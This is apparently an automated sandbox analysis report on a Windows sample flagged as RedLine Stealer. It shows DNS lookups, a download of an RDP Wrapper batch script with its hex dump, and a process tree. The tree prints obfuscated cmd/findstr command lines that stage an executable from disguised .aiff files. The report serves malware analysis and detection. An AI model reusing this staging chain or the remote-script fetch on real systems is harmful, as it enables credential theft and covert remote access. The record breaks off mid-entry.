                                                                              Dec 27, 2024 08:20:29.347620010 CET1.1.1.1192.168.2.40xd7f8Name error (3)21jhss.clubnonenoneA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:20:34.269666910 CET1.1.1.1192.168.2.40xd80bName error (3)21jhss.clubnonenoneA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:20:39.430558920 CET1.1.1.1192.168.2.40xd5b4Name error (3)21jhss.clubnonenoneA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:20:44.177156925 CET1.1.1.1192.168.2.40x9f3dName error (3)21jhss.clubnonenoneA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:20:45.504179001 CET1.1.1.1192.168.2.40x48b4No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:20:45.504179001 CET1.1.1.1192.168.2.40x48b4No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:20:45.504179001 CET1.1.1.1192.168.2.40x48b4No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:20:45.504179001 CET1.1.1.1192.168.2.40x48b4No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:20:49.171135902 CET1.1.1.1192.168.2.40x107dName error (3)21jhss.clubnonenoneA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:20:54.171375990 CET1.1.1.1192.168.2.40xefa1Name error (3)21jhss.clubnonenoneA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:20:59.186566114 CET1.1.1.1192.168.2.40x4f9fName error (3)21jhss.clubnonenoneA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:21:04.177865028 CET1.1.1.1192.168.2.40xc4c3Name error (3)21jhss.clubnonenoneA (IP address)IN (0x0001)false
                                                                              • raw.githubusercontent.com
                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.449842185.199.111.1334436972C:\Windows\System32\wscript.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-27 07:20:47 UTC224OUTGET /asmtron/rdpwrap/master/bin/autoupdate.bat HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept: */*
                                                                              Accept-Language: en-CH
                                                                              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                              Host: raw.githubusercontent.com
                                                                              2024-12-27 07:20:47 UTC903INHTTP/1.1 200 OK
                                                                              Connection: close
                                                                              Content-Length: 17946
                                                                              Cache-Control: max-age=300
                                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              ETag: "34ddb13dc81c9df2a5823b82969257c4f430ce21f776bd4cd73465e379057067"
                                                                              Strict-Transport-Security: max-age=31536000
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Frame-Options: deny
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-GitHub-Request-Id: B89A:197A7A:12F68CF:1573134:676E554F
                                                                              Accept-Ranges: bytes
                                                                              Date: Fri, 27 Dec 2024 07:20:47 GMT
                                                                              Via: 1.1 varnish
                                                                              X-Served-By: cache-ewr-kewr1740043-EWR
                                                                              X-Cache: MISS
                                                                              X-Cache-Hits: 0
                                                                              X-Timer: S1735284047.256789,VS0,VE54
                                                                              Vary: Authorization,Accept-Encoding,Origin
                                                                              Access-Control-Allow-Origin: *
                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                              X-Fastly-Request-ID: 36e31271af1b9ce32e209ef1858d6ad583ea1b2f
                                                                              Expires: Fri, 27 Dec 2024 07:25:47 GMT
                                                                              Source-Age: 0
                                                                              2024-12-27 07:20:47 UTC1378INData Raw: 3c 21 2d 2d 20 3a 20 42 65 67 69 6e 20 6f 66 20 62 61 74 63 68 20 73 63 72 69 70 74 0d 0a 40 65 63 68 6f 20 6f 66 66 0d 0a 73 65 74 4c 6f 63 61 6c 20 45 6e 61 62 6c 65 45 78 74 65 6e 73 69 6f 6e 73 0d 0a 73 65 74 6c 6f 63 61 6c 20 45 6e 61 62 6c 65 44 65 6c 61 79 65 64 45 78 70 61 6e 73 69 6f 6e 0d 0a 3a 3a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5f 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5f 0d 0a 3a 3a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5f 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7c 20 7c 20 20 20 20 20 20 5f 20 20 20 20 20 20 20 20 20 20 7c 20 7c 20 20 20 20 20 20 20 20 20 20 5f 0d 0a 3a 3a 20 20 20 5f 5f 5f 5f 20 5f 20
                                                                              Data Ascii: ... : Begin of batch script@echo offsetLocal EnableExtensionssetlocal EnableDelayedExpansion:: _ _:: _ | | _ | | _:: ____ _
                                                                              2024-12-27 07:20:47 UTC1378INData Raw: 65 72 20 61 6e 64 20 61 6c 6c 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7d 0d 0a 3a 3a 0d 0a 3a 3a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a 3a 3a 20 4c 6f 63 61 74 69 6f 6e 20 6f 66 20 6e 65 77 2f 75 70 64 61 74 65 64 20 72 64 70 77 72 61 70 2e 69 6e 69 20 66 69 6c 65 73 0d 0a 3a 3a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a 73 65 74 20 72 64 70 77 72 61 70 5f 69 6e 69 5f 75 70 64 61 74 65 5f 67 69 74 68 75 62 5f 31 3d 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 61 73 6d 74 72 6f 6e 2f 72 64 70 77 72
                                                                              Data Ascii: er and all other contributors }:::: -----------------------------------------:: Location of new/updated rdpwrap.ini files:: -----------------------------------------set rdpwrap_ini_update_github_1="https://raw.githubusercontent.com/asmtron/rdpwr
                                                                              2024-12-27 07:20:47 UTC1378INData Raw: 72 61 70 2e 64 6c 6c 22 0d 0a 73 65 74 20 72 64 70 77 72 61 70 5f 69 6e 69 3d 22 25 7e 64 70 30 72 64 70 77 72 61 70 2e 69 6e 69 22 0d 0a 73 65 74 20 72 64 70 77 72 61 70 5f 69 6e 69 5f 63 68 65 63 6b 3d 25 72 64 70 77 72 61 70 5f 69 6e 69 25 0d 0a 73 65 74 20 72 64 70 77 72 61 70 5f 6e 65 77 5f 69 6e 69 3d 22 25 7e 64 70 30 72 64 70 77 72 61 70 5f 6e 65 77 2e 69 6e 69 22 0d 0a 73 65 74 20 67 69 74 68 75 62 5f 6c 6f 63 61 74 69 6f 6e 3d 31 0d 0a 73 65 74 20 72 65 74 72 79 5f 6e 65 74 77 6f 72 6b 5f 63 68 65 63 6b 3d 30 0d 0a 73 65 74 20 76 65 72 73 69 6f 6e 5f 63 68 65 63 6b 3d 30 0d 0a 73 65 74 20 75 70 64 61 74 65 64 3d 30 0d 0a 3a 3a 0d 0a 65 63 68 6f 20 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f
                                                                              Data Ascii: rap.dll"set rdpwrap_ini="%~dp0rdpwrap.ini"set rdpwrap_ini_check=%rdpwrap_ini%set rdpwrap_new_ini="%~dp0rdpwrap_new.ini"set github_location=1set retry_network_check=0set version_check=0set updated=0::echo _________________________________
                                                                              2024-12-27 07:20:47 UTC1378INData Raw: 2f 79 20 25 61 75 74 6f 75 70 64 61 74 65 5f 6e 65 77 5f 62 61 74 25 20 25 61 75 74 6f 75 70 64 61 74 65 5f 62 61 74 25 0d 0a 29 20 65 6c 73 65 20 28 0d 0a 20 20 20 20 69 66 20 65 78 69 73 74 20 25 61 75 74 6f 75 70 64 61 74 65 5f 6e 65 77 5f 62 61 74 25 20 64 65 6c 20 25 61 75 74 6f 75 70 64 61 74 65 5f 6e 65 77 5f 62 61 74 25 0d 0a 20 20 20 20 69 66 20 2f 69 20 6e 6f 74 20 22 25 7e 31 22 3d 3d 22 22 20 28 0d 0a 20 20 20 20 20 20 20 20 65 63 68 6f 20 5b 78 5d 20 55 6e 6b 6e 6f 77 6e 20 61 72 67 75 6d 65 6e 74 20 73 70 65 63 69 66 69 65 64 3a 20 22 25 7e 31 22 0d 0a 20 20 20 20 20 20 20 20 65 63 68 6f 20 5b 2a 5d 20 53 75 70 70 6f 72 74 65 64 20 61 72 67 6d 65 6e 74 73 2f 6f 70 74 69 6f 6e 73 20 61 72 65 3a 0d 0a 20 20 20 20 20 20 20 20 65 63 68 6f 20 20
                                                                              Data Ascii: /y %autoupdate_new_bat% %autoupdate_bat%) else ( if exist %autoupdate_new_bat% del %autoupdate_new_bat% if /i not "%~1"=="" ( echo [x] Unknown argument specified: "%~1" echo [*] Supported argments/options are: echo
                                                                              2024-12-27 07:20:47 UTC1378INData Raw: 22 52 55 4e 4e 49 4e 47 22 20 3e 6e 75 6c 26 26 28 0d 0a 20 20 20 20 65 63 68 6f 20 5b 2d 5d 20 54 65 72 6d 53 65 72 76 69 63 65 20 4e 4f 54 20 72 75 6e 6e 69 6e 67 5e 5e 21 0d 0a 20 20 20 20 63 61 6c 6c 20 3a 69 6e 73 74 61 6c 6c 0d 0a 29 7c 7c 28 0d 0a 20 20 20 20 65 63 68 6f 20 5b 2b 5d 20 54 65 72 6d 53 65 72 76 69 63 65 20 72 75 6e 6e 69 6e 67 2e 0d 0a 29 0d 0a 3a 3a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a 3a 3a 20 32 29 20 63 68 65 63 6b 20 69 66 20 6c 69 73 74 65 6e 65 72 20 73 65 73 73 69 6f 6e 20 72 64 70 2d 74 63 70 20 65 78 69 73 74 0d 0a 3a 3a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d
                                                                              Data Ascii: "RUNNING" >nul&&( echo [-] TermService NOT running^^! call :install)||( echo [+] TermService running.):: ------------------------------------------:: 2) check if listener session rdp-tcp exist:: -----------------------------------
                                                                              2024-12-27 07:20:47 UTC1378INData Raw: 28 0d 0a 20 20 20 20 65 63 68 6f 20 5b 2d 5d 20 4e 4f 54 20 66 6f 75 6e 64 20 77 69 6e 64 6f 77 73 20 72 65 67 69 73 74 72 79 20 65 6e 74 72 79 20 66 6f 72 20 22 72 64 70 77 72 61 70 2e 64 6c 6c 22 5e 5e 21 0d 0a 20 20 20 20 69 66 20 25 72 64 70 77 72 61 70 5f 69 6e 73 74 61 6c 6c 65 64 25 3d 3d 22 30 22 20 28 0d 0a 20 20 20 20 20 20 20 20 63 61 6c 6c 20 3a 69 6e 73 74 61 6c 6c 0d 0a 20 20 20 20 29 0d 0a 29 0d 0a 3a 3a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a 3a 3a 20 34 29 20 63 68 65 63 6b 20 69 66 20 72 64 70 77 72 61 70 2e 64 6c 6c 20 66 69 6c 65 20 65 78 69 73 74 73 0d 0a 3a 3a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d
                                                                              Data Ascii: ( echo [-] NOT found windows registry entry for "rdpwrap.dll"^^! if %rdpwrap_installed%=="0" ( call :install )):: -----------------------------------:: 4) check if rdpwrap.dll file exists:: ---------------------------------
                                                                              2024-12-27 07:20:47 UTC1378INData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a 3a 3a 20 37 29 20 63 68 65 63 6b 20 69 66 20 69 6e 73 74 61 6c 6c 65 64 20 66 69 6c 65 20 76 65 72 73 69 6f 6e 20 69 73 20 64 69 66 66 65 72 65 6e 74 20 74 6f 20 74 68 65 20 6c 61 73 74 20 73 61 76 65 64 20 66 69 6c 65 20 76 65 72 73 69 6f 6e 20 69 6e 20 72 65 67 69 73 74 72 79 0d 0a 3a 3a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a 65 63 68 6f 20 5b 2a 5d 20 52 65 61 64 20 6c 61 73 74 20 22 74 65 72 6d 73 72 76 2e 64 6c 6c 22 20 76 65 72 73 69 6f 6e 20 66 72 6f 6d 20 74 68 65 20 77
                                                                              Data Ascii: ------------:: 7) check if installed file version is different to the last saved file version in registry:: ------------------------------------------------------------------------------------------echo [*] Read last "termsrv.dll" version from the w
                                                                              2024-12-27 07:20:47 UTC1378INData Raw: 64 6c 6c 5f 76 65 72 25 5d 22 20 25 72 64 70 77 72 61 70 5f 69 6e 69 5f 63 68 65 63 6b 25 20 3e 6e 75 6c 26 26 28 0d 0a 20 20 20 20 20 20 20 20 65 63 68 6f 20 5b 2b 5d 20 46 6f 75 6e 64 20 22 74 65 72 6d 73 72 76 2e 64 6c 6c 22 20 76 65 72 73 69 6f 6e 20 65 6e 74 72 79 20 5b 25 74 65 72 6d 73 72 76 5f 64 6c 6c 5f 76 65 72 25 5d 20 69 6e 20 66 69 6c 65 20 25 72 64 70 77 72 61 70 5f 69 6e 69 5f 63 68 65 63 6b 25 2e 0d 0a 20 20 20 20 20 20 20 20 65 63 68 6f 20 5b 2a 5d 20 52 44 50 20 57 72 61 70 70 65 72 20 73 65 65 6d 73 20 74 6f 20 62 65 20 75 70 2d 74 6f 2d 64 61 74 65 20 61 6e 64 20 77 6f 72 6b 69 6e 67 2e 2e 2e 0d 0a 20 20 20 20 29 7c 7c 28 0d 0a 20 20 20 20 20 20 20 20 65 63 68 6f 20 5b 2d 5d 20 4e 4f 54 20 66 6f 75 6e 64 20 22 74 65 72 6d 73 72 76 2e
                                                                              Data Ascii: dll_ver%]" %rdpwrap_ini_check% >nul&&( echo [+] Found "termsrv.dll" version entry [%termsrv_dll_ver%] in file %rdpwrap_ini_check%. echo [*] RDP Wrapper seems to be up-to-date and working... )||( echo [-] NOT found "termsrv.
                                                                              2024-12-27 07:20:47 UTC1378INData Raw: 0d 0a 29 0d 0a 73 65 74 20 72 64 70 77 72 61 70 5f 69 6e 73 74 61 6c 6c 65 64 3d 22 31 22 0d 0a 25 52 44 50 57 49 6e 73 74 5f 65 78 65 25 20 2d 75 0d 0a 25 52 44 50 57 49 6e 73 74 5f 65 78 65 25 20 2d 69 20 2d 6f 0d 0a 63 61 6c 6c 20 3a 73 65 74 4e 4c 41 0d 0a 67 6f 74 6f 20 3a 65 6f 66 0d 0a 3a 3a 0d 0a 3a 3a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a 3a 3a 20 52 65 73 74 61 72 74 20 52 44 50 20 57 72 61 70 70 65 72 0d 0a 3a 3a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a 3a 72 65 73 74 61 72 74 0d 0a 65 63 68 6f 2e 0d 0a 65 63 68 6f 20 5b 2a 5d 20 52 65 73 74 61 72 74 20 52 44 50 20 57 72 61 70 70 65 72 20 77 69 74 68 20 6e 65 77 20 69 6e 69 20 28 75 6e 69 6e 73 74 61 6c 6c 20 61 6e 64 20 72 65 69 6e 73 74 61
                                                                              Data Ascii: )set rdpwrap_installed="1"%RDPWInst_exe% -u%RDPWInst_exe% -i -ocall :setNLAgoto :eof:::: -------------------:: Restart RDP Wrapper:: -------------------:restartecho.echo [*] Restart RDP Wrapper with new ini (uninstall and reinsta
                                                                              2024-12-27 07:20:47 UTC1378INData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a 3a 63 68 65 63 6b 76 65 72 73 69 6f 6e 0d 0a 69 66 20 25 76 65 72 73 69 6f 6e 5f 63 68 65 63 6b 25 3d 3d 31 20 67 6f 74 6f 20 3a 64 6f 77 6e 6c 6f 61 64 0d 0a 73 65 74 20 76 65 72 73 69 6f 6e 5f 63 68 65 63 6b 3d 31 0d 0a 65 63 68 6f 2e 0d 0a 65 63 68 6f 20 5b 2a 5d 20 67 65 74 20 76 65 72 73 69 6f 6e 20 69 6e 66 6f 20 6f 66 20 61 75 74 6f 75 70 64 61 74 65 2e 62 61 74 20 66 72 6f 6d 20 47 69 74 48 75 62 2e 2e 2e 0d 0a 65 63 68 6f 20 20 20 20 20 2d 5e 3e 20 25 61 75 74 6f 75 70 64 61 74 65 5f 76 65 72 5f 75 72 6c 25 0d 0a 66 6f 72 20 2f 66 20 22 74 6f 6b 65 6e 73 3d 2a 20 75 73 65 62 61 63 6b 71 22 20 25 25 61 20 69 6e 20 28 0d 0a 20 20
                                                                              Data Ascii: --------------------------------------:checkversionif %version_check%==1 goto :downloadset version_check=1echo.echo [*] get version info of autoupdate.bat from GitHub...echo -^> %autoupdate_ver_url%for /f "tokens=* usebackq" %%a in (


                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to dive into process behavior distribution

                                                                              Click to jump to process

                                                                              Target ID:0
                                                                              Start time:02:18:56
                                                                              Start date:27/12/2024
                                                                              Path:C:\Users\user\Desktop\8lOT1rXZp5.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\8lOT1rXZp5.exe"
                                                                              Imagebase:0x400000
                                                                              File size:4'288'512 bytes
                                                                              MD5 hash:34807A743F2D680EEF051852EAEF0B16
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:1
                                                                              Start time:02:18:57
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\makecab.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\makecab.exe"
                                                                              Imagebase:0x800000
                                                                              File size:68'096 bytes
                                                                              MD5 hash:00824484BE0BCE2A430D7F43CD9BABA5
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:02:18:57
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:3
                                                                              Start time:02:18:57
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c WEHuzypTIfJLQWpZ & HMYPflMZogRtPmKziXCRecxqxWV & rIgSHQwdwGHxUulRaOS & cmd < Adunazione.aiff
                                                                              Imagebase:0x240000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:4
                                                                              Start time:02:18:57
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:5
                                                                              Start time:02:18:57
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:cmd
                                                                              Imagebase:0x240000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:6
                                                                              Start time:02:18:59
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
                                                                              Imagebase:0x820000
                                                                              File size:29'696 bytes
                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:7
                                                                              Start time:02:18:59
                                                                              Start date:27/12/2024
                                                                              Path:C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com
                                                                              Wow64 process (32bit):true
                                                                              Commandline:Rifiutare.exe.com D
                                                                              Imagebase:0xc30000
                                                                              File size:943'784 bytes
                                                                              MD5 hash:78BA0653A340BAC5FF152B21A83626CC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 5%, ReversingLabs
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:8
                                                                              Start time:02:18:59
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
                                                                              Imagebase:0x820000
                                                                              File size:29'696 bytes
                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:9
                                                                              Start time:02:18:59
                                                                              Start date:27/12/2024
                                                                              Path:C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com D
                                                                              Imagebase:0xc30000
                                                                              File size:943'784 bytes
                                                                              MD5 hash:78BA0653A340BAC5FF152B21A83626CC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000009.00000003.1972771955.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.1973535617.00000000046BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000003.1973535617.00000000046BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000009.00000003.1972870705.00000000046C6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:10
                                                                              Start time:02:18:59
                                                                              Start date:27/12/2024
                                                                              Path:C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com
                                                                              Wow64 process (32bit):true
                                                                              Commandline:Uno.exe.com f
                                                                              Imagebase:0xa00000
                                                                              File size:943'784 bytes
                                                                              MD5 hash:78BA0653A340BAC5FF152B21A83626CC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 5%, ReversingLabs
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:11
                                                                              Start time:02:18:59
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
                                                                              Imagebase:0x820000
                                                                              File size:29'696 bytes
                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:12
                                                                              Start time:02:19:00
                                                                              Start date:27/12/2024
                                                                              Path:C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com
                                                                              Wow64 process (32bit):true
